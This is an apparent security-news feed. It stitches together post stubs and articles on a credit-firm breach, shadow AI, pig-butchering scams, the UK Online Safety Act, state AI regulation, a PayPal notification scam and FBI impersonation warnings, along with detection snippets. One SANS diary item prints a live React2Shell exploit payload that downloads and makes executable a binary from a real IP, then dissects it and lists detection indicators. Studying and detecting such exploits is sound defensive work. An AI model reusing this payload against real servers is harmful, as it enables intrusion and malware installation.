Featured Chrome Browser Extension Caught Intercepting Millions of Users' AI Chats

A data breach at 700Credit, a credit reporting and ID verification services firm, affected 5.6 million people, allowing hackers to steal the personal information of customers of the firm's client companies. 700Credit executives said the breach happened after bad actors compromised the system of a partner company.

The post Hackers Steal Personal Data in 700Credit Breach Affecting 5.6 Million appeared first on Security Boulevard.

ServiceNow Inc. is in advanced talks to acquire cybersecurity startup Armis in a deal that could reach $7 billion, its largest ever, according to reports. Bloomberg News first reported the discussions over the weekend, noting that an announcement could come within days. However, sources cautioned that the deal could still collapse or attract competing bidders...

The post ServiceNow in Advanced Talks to Acquire Armis for $7 Billion: Reports appeared first on Security Boulevard.

Session 6A: LLM Privacy and Usable Privacy

Authors, Creators & Presenters: Xiaoyuan Wu (Carnegie Mellon University), Lydia Hu (Carnegie Mellon University), Eric Zeng (Carnegie Mellon University), Hana Habib (Carnegie Mellon University), Lujo Bauer (Carnegie Mellon University)

PAPER

Transparency or Information Overload? Evaluating Users' Comprehension and Perceptions of the iOS App Privacy Report

Apple's App Privacy Report, released in 2021, aims to inform iOS users about apps' access to their data and sensors (e.g., contacts, camera) and, unlike other privacy dashboards, what domains are contacted by apps and websites. To evaluate the effectiveness of the privacy report, we conducted semi-structured interviews to examine users' reactions to the information, their understanding of relevant privacy implications, and how they might change their behavior to address privacy concerns. Participants easily understood which apps accessed data and sensors at certain times on their phones, and knew how to remove an app's permissions in case of unexpected access. In contrast, participants had difficulty understanding apps' and websites' network activities. They were confused about how and why network activities occurred, overwhelmed by the number of domains their apps contacted, and uncertain about what remedial actions they could take against potential privacy threats. While the privacy report and similar tools can increase transparency by presenting users with details about how their data is handled, we recommend providing more interpretation or aggregation of technical details, such as the purpose of contacting domains, to help users make informed decisions.

ABOUT NDSS

The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.

Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators', Authors' and Presenters' superb NDSS Symposium 2025 Conference content on the organization's YouTube channel.

The post NDSS 2025 – Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report appeared first on Security Boulevard.

Your employees are using AI whether you’ve sanctioned it or not. And even if you’ve carefully vetted and approved an enterprise-grade AI platform, you’re still at risk of attacks and data leakage.

Security leaders are grappling with three types of risks from sanctioned and unsanctioned AI tools. First, there’s shadow AI, all those AI tools that employees use without the approval or knowledge of IT. Then there are the risks that come with sanctioned platforms and agents. If those weren’t enough, you still have to prevent the exposure of sensitive information.

The prevalence of AI use in the workplace is clear: a recent survey by CybSafe and the National Cybersecurity Alliance shows that 65% of respondents are using AI. More than four in 10 (43%) admit to sharing sensitive information with AI tools without their employer’s knowledge. If you haven’t already implemented an AI acceptable use policy, it’s time to get moving. An AI acceptable use policy is an important first step in addressing shadow AI, risky platforms and agents, and data leakage. Let’s dig into each of these three risks and the steps you can take to protect your organization.

The key risks: Each unsanctioned shadow AI tool is an unmanaged part of your attack surface, bringing unvetted vulnerabilities and integrations that existing security controls can’t see, where data can leak or threats can enter. The result? You can’t govern AI use. You can try to block it, but as we’ve learned from other shadow IT trends, you really can’t stop it. So, how can you reduce risk while meeting the needs of the business?

The key risks: Good AI governance means moving users from risky shadow AI to sanctioned enterprise environments. But sanctioned or not, AI platforms introduce unique risks. Threat actors can use sophisticated techniques like prompt injection to trick the tool into ignoring its guardrails. They might employ model manipulation to poison the underlying LLM and cause exfiltration of private data. In addition, the tools themselves can raise issues related to data privacy, data residency, insecure data sharing, and bias. Knowing what to look for in an enterprise-grade AI vendor is the first step.

The key risks: Even if you’ve done your best to educate employees about shadow AI and performed your due diligence in choosing enterprise AI tools to sanction for use, data leakage remains a risk. Two common pathways for data leakage are:

When your employees adopt AI, you don't have to choose between innovation and security. The unified exposure management approach of Tenable One allows you to discover all AI use with Tenable AI Aware and then protect your sensitive data with Tenable AI Exposure. This combination gives you visibility and enables you to manage your attack surface while safely embracing the power of AI.

Let’s briefly explore how these solutions can help you across the areas we covered in this post:

Unsanctioned AI usage across your organization creates an unmanaged attack surface and a massive blind spot for your security team. Tenable AI Aware can discover all sanctioned and unsanctioned AI usage across your organization. Tenable AI Exposure gives your security teams visibility into the sensitive data that’s exposed so you can enforce policies and control AI-related risks.

Threat actors use sophisticated techniques like prompt injection to trick sanctioned AI platforms into ignoring their guardrails. The prompt-level visibility and real-time analysis you get with Tenable AI Exposure can pinpoint these novel attacks and score their severity, enabling your security team to prioritize and remediate the most critical exposure pathways within your enterprise environment. In addition, AI Exposure helps you uncover AI misconfigurations that could allow connections to an unvetted third-party tool or unintentionally make an agent meant only for internal use publicly available. Fixing such misconfigurations reduces the risks of data leaks and exfiltration.

The static, rule-based approach of traditional data loss prevention (DLP) tools can’t manage non-deterministic AI outputs or novel attacks, which leaves gaps through which sensitive information can exit your organization. Tenable AI Exposure fills these gaps by monitoring AI interactions and workflows. It uses a number of machine learning and deep learning models to learn about new attack techniques based on the semantic and policy-violating intent of the interaction, not just simple keywords. This can then help inform other blocking solutions as part of your mitigation actions.

The post Security for AI: How Shadow AI, Platform Risks, and Data Leakage Leave Your Organization Exposed appeared first on Security Boulevard.

Campus Technology & THE Journal Name Cloud Monitor as Winner in the Cybersecurity Risk Management Category

BOULDER, Colo.—December 15, 2025—ManagedMethods, the leading provider of cybersecurity, safety, web filtering, and classroom management solutions for K-12 schools, is pleased to announce that Cloud Monitor has won in this year’s Campus Technology & THE Journal 2025 Product of ...

The post Cloud Monitor Wins Cybersecurity Product of the Year 2025 appeared first on ManagedMethods Cybersecurity, Safety & Compliance for K-12.

The post Cloud Monitor Wins Cybersecurity Product of the Year 2025 appeared first on Security Boulevard.

This week on the Lock and Code podcast…

This is the story of the world’s worst scam and how it is being used to fuel entire underground economies that have the power to rival nation-states across the globe. This is the story of “pig butchering.”

“Pig butchering” is a violent term used to describe a growing type of online investment scam that has ruined the lives of countless victims around the world. No age group is spared, nearly no country is untouched, and, if the numbers are true, with more than $6.5 billion stolen in 2024 alone, no scam may be more serious today than this.

Despite this severity, like many types of online fraud today, most pig-butchering scams start with a simple “hello.”

Sent through text or as a direct message on social media platforms like X, Facebook, Instagram, or elsewhere, these initial communications are often framed as simple mistakes—a kind stranger was given your number by accident, and if you reply, you’re given a kind apology and a simple lure: “You seem like such a kind person… where are you from?”

Here, the scam has already begun. Pig butchers, like romance scammers, build emotional connections with their victims. For months, their messages focus on everyday life, from family to children to marriage to work.

But, with time, once the scammer believes they’ve gained the trust of their victim, they launch their attack: An investment “opportunity.”

Pig butchers tell their victims that they’ve personally struck it rich by investing in cryptocurrency, and they want to share the wealth. Here, the scammers will lead their victims through opening an entirely bogus investment account, which is made to look real through sham websites that are littered with convincing tickers, snazzy analytics, and eye-popping financial returns.

When the victims “invest” in these accounts, they’re actually giving money directly to their scammers. But when the victims log into their online “accounts,” they see their money growing and growing, which convinces many of them to invest even more, perhaps even until their life savings are drained.

This charade goes on as long as possible until the victims learn the truth and the scammers disappear. The continued theft from these victims is where “pig-butchering” gets its name—with scammers fattening up their victims before slaughter.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Erin West, founder of Operation Shamrock and former Deputy District Attorney of Santa Clara County, about pig butchering scams, the failures of major platforms like Meta to stop them, and why this global crisis represents far more than just a few lost dollars.

“It’s really the most compelling, horrific, humanitarian global crisis that is happening in the world today.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

http://creativecommons.org/licenses/by/4.0/

Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

Since the Online Safety Act took effect in late July, UK internet users have made it very clear to their politicians that they do not want anything to do with this censorship regime. Just days after age checks came into effect, VPN apps became the most downloaded on Apple's App Store in the UK, and a petition calling for the repeal of the Online Safety Act (OSA) hit over 400,000 signatures.

In the months since, more than 550,000 people have petitioned Parliament to repeal or reform the Online Safety Act, making it one of the largest public expressions of concern about a UK digital law in recent history. The OSA has galvanized swathes of the UK population, and it’s high time for politicians to take that seriously.

Last week, EFF joined Open Rights Group, Big Brother Watch, and Index on Censorship in sending a briefing to UK politicians urging them to listen to their constituents and repeal the Online Safety Act ahead of this week’s Parliamentary petition debate on 15 December.

The legislation is a threat to user privacy, restricts free expression by arbitrating speech online, exposes users to algorithmic discrimination through face checks, and effectively blocks millions of people without a personal device or form of ID from accessing the internet. The briefing highlights how, in the months since the OSA came into effect, we have seen the legislation:

Our briefing continues:

“Those raising concerns about the Online Safety Act are not opposing child safety. They are asking for a law that does both: protects children and respects fundamental rights, including children’s own freedom of expression rights.”

The petition shows that hundreds of thousands of people feel the current Act tilts too far, creating unnecessary risks for free expression and ordinary online life. With sensible adjustments, Parliament can restore confidence that online safety and freedom of expression rights can coexist.

If the UK really wants to achieve its goal of being the safest place in the world to go online, it must lead the way in introducing policies that actually protect all users—including children—rather than pushing the enforcement of legislation that harms the very people it was meant to protect.

Read the briefing in full here.

Cast your mind back to May of this year: Congress was in the throes of debate over the massive budget bill. Amidst the many seismic provisions, Senator Ted Cruz dropped a ticking time bomb of tech policy: a ten-year moratorium on the ability of states to regulate artificial intelligence. To many, this was catastrophic. The few massive AI companies seem to be swallowing our economy whole: their energy demands are overriding household needs, their data demands are overriding creators’ copyright, and their products are triggering mass unemployment as well as new types of clinical psychoses. In a moment where Congress is seemingly unable to act to pass any meaningful consumer protections or market regulations, why would we hamstring the one entity evidently capable of doing so—the states? States that have already enacted consumer protections and other AI regulations, like California, and those actively debating them, like Massachusetts, were alarmed. Seventeen Republican governors wrote a letter decrying the idea, and it was ultimately killed in a rare vote of bipartisan near-unanimity.

The idea is back. Before Thanksgiving, a House Republican leader suggested they might slip it into the annual defense spending bill. Then, a draft document leaked outlining the Trump administration’s intent to enforce the state regulatory ban through executive powers. An outpouring of opposition (including from some Republican state leaders) beat back that notion for a few weeks, but on Monday, Trump posted on social media that the promised Executive Order is indeed coming soon. That would put a growing cohort of states, including California and New York, as well as Republican strongholds like Utah and Texas, in jeopardy.

The constellation of motivations behind this proposal is clear: conservative ideology, cash, and China.

The intellectual argument in favor of the moratorium is that “freedom”-killing state regulation on AI would create a patchwork that would be difficult for AI companies to comply with, which would slow the pace of innovation needed to win an AI arms race with China. AI companies and their investors have been aggressively peddling this narrative for years now, and are increasingly backing it with exorbitant lobbying dollars. It’s a handy argument, useful not only to kill regulatory constraints, but also—companies hope—to win federal bailouts and energy subsidies.

Citizens should parse that argument from their own point of view, not Big Tech’s. Preventing states from regulating AI means that those companies get to tell Washington what they want, but your state representatives are powerless to represent your own interests. Which freedom is more important to you: the freedom for a few near-monopolies to profit from AI, or the freedom for you and your neighbors to demand protections from its abuses?

There is an element of this that is more partisan than ideological. Vice President J.D. Vance argued that federal preemption is needed to prevent “progressive” states from controlling AI’s future. This is an indicator of creeping polarization, where Democrats decry the monopolism, bias, and harms attendant to corporate AI and Republicans reflexively take the opposite side. It doesn’t help that some in the parties also have direct financial interests in the AI supply chain.

But this does not need to be a partisan wedge issue: both Democrats and Republicans have strong reasons to support state-level AI legislation. Everyone shares an interest in protecting consumers from harm created by Big Tech companies. In leading the charge to kill Cruz’s initial AI moratorium proposal, Republican Senator Marsha Blackburn explained that “This provision could allow Big Tech to continue to exploit kids, creators, and conservatives … we can’t block states from making laws that protect their citizens.” More recently, Florida Governor Ron DeSantis has said he wants to regulate AI in his state.

The often-heard complaint that it is hard to comply with a patchwork of state regulations rings hollow. Pretty much every other consumer-facing industry has managed to deal with local regulation—automobiles, children’s toys, food, and drugs—and those regulations have been effective consumer protections. The AI industry includes some of the most valuable companies globally and has demonstrated the ability to comply with differing regulations around the world, including the EU’s AI and data privacy regulations, which are substantially more onerous than those so far adopted by US states. If we can’t leverage state regulatory power to shape the AI industry, to what industry could it possibly apply?

The regulatory superpower that states have here is not size and force, but rather speed and locality. We need the “laboratories of democracy” to experiment with different types of regulation that fit the specific needs and interests of their constituents and evolve responsively to the concerns they raise, especially in an area as consequential and rapidly changing as AI.

We should embrace the ability of regulation to be a driver—not a limiter—of innovation. Regulations don’t restrict companies from building better products or making more profit; they help channel that innovation in specific ways that protect the public interest. Drug safety regulations don’t prevent pharma companies from inventing drugs; they force them to invent drugs that are safe and efficacious. States can direct private innovation to serve the public.

But, most importantly, regulations are needed to prevent the most dangerous impact of AI today: the concentration of power associated with trillion-dollar AI companies and the power-amplifying technologies they are producing. We outline the specific ways that the use of AI in governance can disrupt existing balances of power, and how to steer those applications towards more equitable balances, in our new book, Rewiring Democracy. In the nearly complete absence of Congressional action on AI in the years since it swept the world’s attention, it has become clear that states are the only effective policy levers we have against that concentration of power.

Instead of impeding states from regulating AI, the federal government should support them to drive AI innovation. If proponents of a moratorium worry that the private sector won’t deliver what they think is needed to compete in the new global economy, then we should engage government to help generate AI innovations that serve the public and solve the problems most important to people. Following the lead of countries like Switzerland, France, and Singapore, the US could invest in developing and deploying AI models designed as public goods: transparent, open, and useful for tasks in public administration and governance.

Maybe you don’t trust the federal government to build or operate an AI tool that acts in the public interest? We don’t either. States are a much better place for this innovation to happen because they are closer to the people, they are charged with delivering most government services, they are better aligned with local political sentiments, and they have achieved greater trust. They’re where we can test, iterate, compare, and contrast regulatory approaches that could inform eventual and better federal policy. And, while the costs of training and operating high-performance AI tools like large language models have declined precipitously, the federal government can play a valuable role here in funding cash-strapped states to lead this kind of innovation.

This essay was written with Nathan E. Sanders, and originally appeared in Gizmodo.

EDITED TO ADD: Trump signed an executive order banning state-level AI regulations hours after this was published. This is not going to be the last word on the subject.

After an investigation by BleepingComputer, PayPal closed a loophole that allowed scammers to send emails from the legitimate service@paypal.com email address.

Following reports from people who received emails claiming an automatic payment had been cancelled, BleepingComputer found that cybercriminals were abusing a PayPal feature that allows merchants to pause a customer’s subscription.

The scammers created a PayPal subscription and then paused it, which triggers PayPal’s genuine “Your automatic payment is no longer active” notification to the subscriber. They also set up a fake subscriber account, likely a Google Workspace mailing list, which automatically forwards any email it receives to all other group members.

This allowed the criminals to use a similar method to one we’ve described before, but this time with the legitimate service@paypal.com address as the sender, bypassing email filters and a first casual check by the recipient.
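Because the genuine notice is relayed by the scammers' own list, the forwarding step can leave traces in the message headers. The following is a minimal heuristic sketch, not a PayPal or Google tool. It assumes, without confirmation from BleepingComputer or PayPal, that a list-forwarded copy keeps the mailing list's address in the To: header rather than yours, and that the list manager adds a List-Id header (RFC 2919), as many do. The function names and sample addresses are hypothetical, and an empty result does not mean a message is safe.

```javascript
// Hypothetical heuristic: flag "service@paypal.com" notices that reached you
// through a mailing list instead of being addressed to you directly.
// Assumes you have the raw message text (e.g. a mail client's "show original").

// Parse the header block of a raw RFC 5322 message into a map with lowercase
// keys. Folded continuation lines are unfolded; repeated headers are joined.
function parseHeaders(raw) {
  const headers = Object.create(null); // no prototype, so any header name is safe
  let last = null;
  for (const line of raw.split(/\r?\n/)) {
    if (line === "") break; // a blank line ends the header block
    if (/^[ \t]/.test(line) && last !== null) {
      headers[last] += " " + line.trim(); // continuation of the previous header
      continue;
    }
    const idx = line.indexOf(":");
    if (idx <= 0) continue; // not a header line; ignore it
    last = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    headers[last] = last in headers ? headers[last] + ", " + value : value;
  }
  return headers;
}

// Return warning flags; an empty list means no flag was raised,
// not that the message is legitimate.
function forwardedNoticeFlags(raw, myAddress) {
  const h = parseHeaders(raw);
  const flags = [];
  if (!/service@paypal\.com/i.test(h["from"] || "")) return flags;
  const recipients = `${h["to"] || ""} ${h["cc"] || ""}`.toLowerCase();
  if (!recipients.includes(myAddress.toLowerCase())) {
    flags.push("not-addressed-to-you");
  }
  if ("list-id" in h) {
    flags.push("delivered-via-mailing-list");
  }
  return flags;
}

// Usage with a made-up message resembling the forwarded notice.
const raw = [
  "From: PayPal <service@paypal.com>",
  "To: billing-team@example.org",
  "List-Id: <billing-team.example.org>",
  "Subject: Your automatic payment is no longer active",
  "",
  "You'll need to contact ...",
].join("\r\n");
console.log(forwardedNoticeFlags(raw, "you@example.com"));
// → ["not-addressed-to-you", "delivered-via-mailing-list"]
```

The check is deliberately narrow: it only looks at delivery metadata, so it complements rather than replaces the content-based red flags listed further down.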

“Your automatic payment is no longer active

You’ll need to contact Sony U.S.A. for more details or to reactivate your automatic payments. Here are the details:”

BleepingComputer says there are slight variations in formatting and in the phone numbers to call, but in essence they are all based on this method.

To create urgency, the scammers made the emails look as though the target had been charged for some high-end, expensive device. They also added a fake “PayPal Support” phone number, encouraging targets to call if they wanted to cancel the payment or had questions.

In this type of tech support scam, the target calls the listed number, and the “support agent” on the other end asks to remotely log in to their computer to check for supposed viruses. They might run a short program to open command prompts and folders, just to scare and distract the victim. Then they’ll ask to install another tool to “fix” things, which will search the computer for anything they can turn into money. Others will sell you fake protection software and bill you for their services. Either way, the result is the same: the victim loses money.

PayPal contacted BleepingComputer to let them know they were closing the loophole:

“We are actively mitigating this matter, and encourage people to always be vigilant online and mindful of unexpected messages. If customers suspect they are a target of a scam, we recommend they contact Customer Support directly through the PayPal app or our Contact page for assistance.”

The best way to stay safe is to stay informed about the tricks scammers use. Learn to spot the red flags that almost always give away scams and phishing emails, and remember:

If you’ve already fallen victim to a tech support scam:



Pro tip: Malwarebytes Scam Guard recognized this email as a scam. Upload any suspicious text, emails, attachments and other files to ask for its opinion. It’s really very good at recognizing scams. Here’s what it reported back for this particular scam:

“Suspicious Email Assessment

This email appears to be a phishing attempt designed to trick you into contacting scammers via a fake customer service number, a suspicious website, or email address. Here’s a breakdown of key warning signs:

Red Flags Detected

- Fake or Spoofed Sender Address

- While it says “service@paypal.com”, sender addresses can be easily spoofed. The real test is the content and behavior of the message, not just the visible address.

- Suspicious URLs

- Links like http://sonyusa.store and [sonyusa.store] (both non-official and unrelated to PayPal or Sony).

- Official PayPal links always use paypal.com domain.

- Non-Official Customer Service Email

- Email provided is sony12service@gmail.com instead of an official Sony or PayPal domain.

- Urgency and Threat of Unauthorized Charges

- Creates panic by telling you a large payment was processed and prompts you to act quickly by contacting their “support” number or email.

- Phone Number Trap

- The number provided (805-500-6377) is likely operated by scammers. Real PayPal will never ask you to contact them via generic phone numbers outside of their secure website.

- Unusual Formatting and Grammar

- Awkward phrasing and formatting errors are common in scams.”

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the "plain" exploit attempts have already been exploited several times. Here is today's most popular exploit payload:

------WebKitFormBoundaryxtherespoopalloverme

Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt').on('finish',()=>process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}

------WebKitFormBoundaryxtherespoopalloverme

Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryxtherespoopalloverme

------WebKitFormBoundaryxtherespoopalloverme--

To make the key components more readable:

process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',

r=>r.pipe(process.mainModule.require('fs').

createWriteStream('/dev/shm/lrt').on('finish'

This statement downloads the binary from 51.81.104.115 into a local file, /dev/shm/lrt.

process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));

The file is then marked as executable. It is unclear whether it is explicitly executed. The VirusTotal summary is somewhat ambiguous regarding the binary, identifying it as either adware or a miner [1]. Currently, this is the most common exploit variant we see for React2Shell.

Other versions of the exploit use /dev/lrt and /tmp/lrt instead of /dev/shm/lrt to store the malware.
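For triage, the distinctive strings in the payload above can be matched against logged request bodies. This is a minimal sketch, assuming you already capture POST bodies somewhere you can read them; the indicator names are hypothetical labels, the strings are copied from the payload and its variants, and the list is neither complete nor an official signature set for CVE-2025-55182. Attackers can vary every one of these strings.

```javascript
// Hypothetical indicator list built from the React2Shell payload shown above.
// A triage aid for logged request bodies, not a complete or official signature.
const INDICATORS = [
  { name: "proto-then", pattern: /\$1:__proto__:then/ },
  { name: "constructor-chain", pattern: /\$1:constructor:constructor/ },
  { name: "resolved-model", pattern: /"status"\s*:\s*"resolved_model"/ },
  { name: "node-require", pattern: /process\.mainModule\.require/ },
  // Drop locations seen so far: /dev/shm/lrt, /dev/lrt and /tmp/lrt.
  { name: "dropper-path", pattern: /\/(?:dev\/shm|dev|tmp)\/lrt\b/ },
  { name: "download-host", pattern: /51\.81\.104\.115/ },
];

// Return the names of all indicators that appear in a request body,
// in the order they are listed above.
function scanBody(body) {
  return INDICATORS.filter(({ pattern }) => pattern.test(body)).map(({ name }) => name);
}

// Usage: a trimmed-down variant that writes to /tmp/lrt instead of /dev/shm/lrt.
const sample =
  '{"then":"$1:__proto__:then","status":"resolved_model",' +
  '"_response":{"_prefix":"process.mainModule.require(\'fs\')' +
  '.createWriteStream(\'/tmp/lrt\')","_formData":{"get":"$1:constructor:constructor"}}}';
console.log(scanBody(sample));
// → ["proto-then", "constructor-chain", "resolved-model", "node-require", "dropper-path"]
```

Matching several structural strings rather than only the download IP is intentional: the host and file path change between variants, while the prototype-walking markers are part of how the exploit works.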

/dev/shm and /tmp are typically world-writable and should always work. Writing to /dev requires root privileges, and these days it is unlikely for a web application to run as root. One recommendation for hardening Linux systems is to create /tmp as its own partition and mark it "noexec" to prevent it from being used as scratch space to run exploit code. But this is sometimes tough to implement when "normal" processes run code in /tmp (not pretty, but done every so often).

[1] https://www.virustotal.com/gui/file/895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b/detection

--

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu



The post Against the Federal Moratorium on State-Level Regulation of AI appeared first on Security Boulevard.

This is the third installment in our four-part 2025 Year-End Roundtable. In Part One, we explored how accountability got personal. In Part Two, we examined how regulatory mandates clashed with operational complexity.

Now …

The post LW ROUNDTABLE: Part 3, Cyber resilience faltered in 2025 — recalibration now under way first appeared on The Last Watchdog.

The post LW ROUNDTABLE: Part 3, Cyber resilience faltered in 2025 — recalibration now under way appeared first on Security Boulevard.

Navigating the Most Complex Regulatory Landscapes in Cybersecurity

Financial services and healthcare organizations operate under the most stringent regulatory frameworks in existence. From HIPAA and PCI-DSS to GLBA, SOX, and emerging regulations like DORA, these industries face a constant barrage of compliance requirements that demand not just checkboxes, but comprehensive, continuously monitored security programs. The

The post Compliance-Ready Cybersecurity for Finance and Healthcare: The Seceon Advantage appeared first on Seceon Inc.

The post Compliance-Ready Cybersecurity for Finance and Healthcare: The Seceon Advantage appeared first on Security Boulevard.

The cybersecurity battlefield has changed. Attackers are faster, more automated, and more persistent than ever. As businesses shift to cloud, remote work, SaaS, and distributed infrastructure, their security needs have outgrown traditional IT support. This is the turning point: Managed Service Providers (MSPs) are evolving into full-scale Managed Security Service Providers (MSSPs) – and the ones

The post Managed Security Services 2.0: How MSPs & MSSPs Can Dominate the Cybersecurity Market in 2025 appeared first on Seceon Inc.

The post Managed Security Services 2.0: How MSPs & MSSPs Can Dominate the Cybersecurity Market in 2025 appeared first on Security Boulevard.

Launching an AI initiative without a robust data strategy and governance framework is a risk many organizations underestimate. Most AI projects stall, deliver poor...

The post Can Your AI Initiative Count on Your Data Strategy and Governance? appeared first on ISHIR | Custom AI Software Development Dallas Fort-Worth Texas.

The post Can Your AI Initiative Count on Your Data Strategy and Governance? appeared first on Security Boulevard.

Learn why modern SaaS platforms are adopting passwordless authentication to improve security and user experience and to reduce breach risk.

The post Why Modern SaaS Platforms Are Switching to Passwordless Authentication appeared first on Security Boulevard.

Most enterprise breaches no longer begin with a firewall failure or a missed patch. They begin with an exposed identity. Credentials harvested from infostealers. Employee logins sold on criminal forums. Executive personas impersonated to trigger wire fraud. Customer identities stitched together from scattered exposures. The modern breach path is identity-first, and that shift …

The post Identity Risk Is Now the Front Door to Enterprise Breaches (and How Digital Risk Protection Stops It Early) appeared first on Security Boulevard.

Join us in the midst of the holiday shopping season as we discuss a growing privacy problem: tracking pixels embedded in marketing emails. According to Proton’s latest Spam Watch 2025 report, nearly 80% of promotional emails now contain trackers that report back your email activity. We discuss how these trackers work, why they become more […]
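A tracking pixel is usually a tiny remote image: when the mail client downloads it, the sender's server learns that the message was opened. The Python sketch below shows one way to spot such images in an email's HTML. It assumes the common heuristic of a remote `<img>` declared as 0 or 1 pixel wide and high; it is not Proton's detection method, and the function name `find_tracking_pixels` and the example URLs are hypothetical.

```python
from html.parser import HTMLParser


class PixelFinder(HTMLParser):
    """Collects <img> sources that look like tracking pixels.

    Heuristic (an assumption, not an exhaustive rule): a remote image whose
    declared width and height are both 0 or 1 pixels.
    """

    def __init__(self) -> None:
        super().__init__()
        self.suspects: list[str] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values may be None.
        if tag != "img":
            return
        a = {name: (value or "") for name, value in attrs}
        src = a.get("src", "")
        tiny = (a.get("width", "").strip() in {"0", "1"}
                and a.get("height", "").strip() in {"0", "1"})
        if tiny and src.startswith(("http://", "https://")):
            self.suspects.append(src)


def find_tracking_pixels(html: str) -> list[str]:
    """Return the src URLs of suspected tracking pixels in an HTML body."""
    finder = PixelFinder()
    finder.feed(html)
    finder.close()
    return finder.suspects


email = """<p>Holiday sale!</p>
<img src="https://t.example.com/open?id=abc123" width="1" height="1">
<img src="https://cdn.example.com/banner.png" width="600" height="200">"""
print(find_tracking_pixels(email))  # ['https://t.example.com/open?id=abc123']
```

The check reads only declared attributes, so it will miss pixels sized with CSS and may flag legitimate spacer images.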

The post The Hidden Threat in Your Holiday Emails: Tracking Pixels and Privacy Concerns appeared first on Shared Security Podcast.

The post The Hidden Threat in Your Holiday Emails: Tracking Pixels and Privacy Concerns appeared first on Security Boulevard.

The FBI Anchorage Field Office has issued a public warning after seeing a sharp increase in fraud cases targeting residents across Alaska. According to federal authorities, scammers are posing as law enforcement officers and government officials in an effort to extort money or steal sensitive personal information from unsuspecting victims.

The warning comes as reports continue to rise involving unsolicited phone calls where criminals falsely claim to represent agencies such as the FBI or other local, state, and federal law enforcement bodies operating in Alaska. These scams fall under a broader category of law enforcement impersonation scams, which rely heavily on fear, urgency, and deception.

Scammers typically contact victims using spoofed phone numbers that appear legitimate. In many cases, callers accuse individuals of failing to report for jury duty or missing a court appearance. Victims are then told that an arrest warrant has been issued in their name.

To avoid immediate arrest or legal consequences, the caller demands payment of a supposed fine. Victims are pressured to act quickly, often being told they must resolve the issue immediately. According to the FBI, these criminals may also provide fake court documents or reference personal details about the victim to make the scam appear more convincing.

In more advanced cases, scammers may use artificial intelligence tools to enhance their impersonation tactics. This includes generating realistic voices or presenting professionally formatted documents that appear to come from official government sources. These methods have contributed to the growing sophistication of government impersonation scams nationwide.

Authorities note that these scams most often occur through phone calls and emails. Criminals commonly use aggressive language and insist on speaking only with the targeted individual. Victims are often told not to discuss the call with family members, friends, banks, or law enforcement agencies.

Payment requests are another key red flag. Scammers typically demand money through methods that are difficult to trace or reverse. These include cash deposits at cryptocurrency ATMs, prepaid gift cards, wire transfers, or direct cryptocurrency payments. The FBI has emphasized that legitimate government agencies never request payment through these channels.

The FBI has reiterated that it does not call members of the public to demand payment or threaten arrest over the phone. Any call claiming otherwise should be treated as fraudulent. This clarification is central to the broader FBI scam warning that Alaska residents are being urged to take seriously.

Data from the FBI’s Internet Crime Complaint Center (IC3) highlights the scale of the problem. In 2024 alone, IC3 received more than 17,000 complaints related to government impersonation scams across the United States. Reported losses from these incidents exceeded $405 million nationwide.

Alaska has not been immune. Reported victim losses in the state surpassed $1.3 million, underscoring the financial and emotional impact these scams can have on individuals and families.

To reduce the risk of falling victim, the FBI urges residents to “take a beat” before responding to any unsolicited communication. Individuals should resist pressure tactics and take time to verify claims independently.

The FBI strongly advises against sharing or confirming personally identifiable information with anyone contacted unexpectedly. Alaskans are also cautioned never to send money, gift cards, cryptocurrency, or other assets in response to unsolicited demands.

Anyone who believes they may have been targeted or victimized should immediately stop communicating with the scammer. Victims should notify their financial institutions, secure their accounts, contact local law enforcement, and file a complaint with the FBI’s Internet Crime Complaint Center at www.ic3.gov. Prompt reporting can help limit losses and prevent others from being targeted.

| Challenge Area | What Will Break / Strain in 2026 | Why It Matters to Leadership | Strategic Imperative |
| --- | --- | --- | --- |
| Regulatory Ambiguity & Evolving Interpretation | Unclear operational expectations around “informed consent,” Significant Data Fiduciary designation, and cross-border data transfers | Risk of over-engineering or non-compliance as regulatory guidance evolves | Build modular, configurable privacy architectures that can adapt without re-platforming |
| Legacy Systems & Distributed Data | Difficulty retrofitting consent enforcement, encryption, audit trails, and real-time controls into legacy and batch-oriented systems | High cost, operational disruption, and extended timelines for compliance | Prioritize modernization of high-risk systems and align vendor roadmaps with DPDP requirements |
| Organizational Governance & Talent Gaps | Privacy cuts across legal, product, engineering, HR, procurement—often without clear ownership; shortage of experienced DPOs | Fragmented accountability increases regulatory and breach risk | Establish cross-functional privacy governance; leverage fractional DPOs and external advisors while building internal capability |
